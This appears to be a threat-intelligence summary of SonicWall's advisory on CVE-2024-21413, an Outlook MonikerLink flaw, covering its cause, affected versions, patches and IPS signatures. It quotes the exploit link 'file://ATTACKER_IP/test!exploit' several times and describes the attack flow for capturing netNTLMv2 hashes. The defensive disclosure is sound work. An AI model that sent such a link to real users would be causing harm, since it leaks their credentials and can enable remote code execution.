Threat Research

Microsoft Outlook Remote Code Execution Vulnerability | SonicWall

CTI

SonicWall disclosed a MonikerLink vulnerability in Microsoft Outlook (CVE-2024-21413) that abuses file:// moniker handling to force SMB authentication and can lead to remote code execution. The flaw can bypass Outlook Protected View using a crafted moniker (for example, file://ATTACKER_IP/test!exploit), enabling capture of netNTLMv2 hashes and both 1-click and 0-click exploitation. #CVE-2024-21413 #MicrosoftOutlook

Keypoints

  • MonikerLink vulnerability CVE-2024-21413 in Microsoft Outlook allows NTLM credential leaks and potential remote code execution by abusing COM monikers.
  • Affected products include Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps (32‑bit and 64‑bit variants).
  • The issue scores CVSS 9.8: network attack vector, low complexity, no privileges or user interaction required in updated PoCs.
  • The flaw targets MkParseDisplayName and file:// moniker parsing; inserting a special character like “!” plus extra text (e.g., file://ATTACKER_IP/test!exploit) bypasses Protected View and triggers SMB authentication.
  • Attack flow: attacker sends a crafted email with a moniker link, an SMB listener captures the resulting netNTLMv2 hash, and a PoC demonstrates 1-click RCE with later 0-click variants.
  • Mitigations include vendor patches and SonicWall IPS signatures IPS:4305 and IPS:4307 to detect the MonikerLink bypass.

MITRE Techniques

  • None mentioned – the article does not reference specific MITRE ATT&CK technique IDs.

Indicators of Compromise

  • [Hyperlink/URI] Exploit moniker used to trigger the vulnerability – file://ATTACKER_IP/test, file://ATTACKER_IP/test!exploit
  • [Vulnerability ID] Identifies the flaw – CVE-2024-21413
  • [IDS/IPS signatures] SonicWall detections released for this exploit – IPS:4305, IPS:4307
  • [Credential artifact] Authentication captured via SMB – netNTLMv2 hash (captured by attacker’s SMB listener)

The vulnerability stems from how Outlook invokes COM monikers via the MkParseDisplayName API: when a file:// moniker is included in an email hyperlink, Outlook can be coerced to resolve the moniker over the network using SMB. By inserting a special character (e.g., “!”) and additional text into the moniker (for example, file://ATTACKER_IP/test!exploit), the normal Protected View checks are bypassed and Outlook initiates an SMB authentication attempt, exposing the victim’s netNTLMv2 hash to a remote SMB listener.

Exploitation is straightforward in practice: an attacker sends a crafted email containing the malicious file:// link, runs an SMB listener and PoC, and waits for the client to resolve the moniker. Initial demonstrations required a victim click (1‑click RCE path), but later proof‑of‑concepts removed the need for interaction (0‑click NTLM leak). The captured netNTLMv2 hash can be relayed or cracked depending on attacker capability, and the flaw can lead to arbitrary code execution by chaining the moniker resolution to payload delivery.

Defensive measures are to apply Microsoft’s vendor patches immediately and deploy network/app protections that detect this behavior; SonicWall released IPS signatures (IPS:4305 and IPS:4307) to flag MonikerLink security feature bypass attempts. Monitoring for unusual SMB outbound connections from email clients and blocking or logging file:// scheme resolutions from untrusted mail content can reduce exposure until systems are patched.

Read more: https://blog.sonicwall.com/en-us/2024/02/microsoft-outlook-remote-code-execution-vulnerability/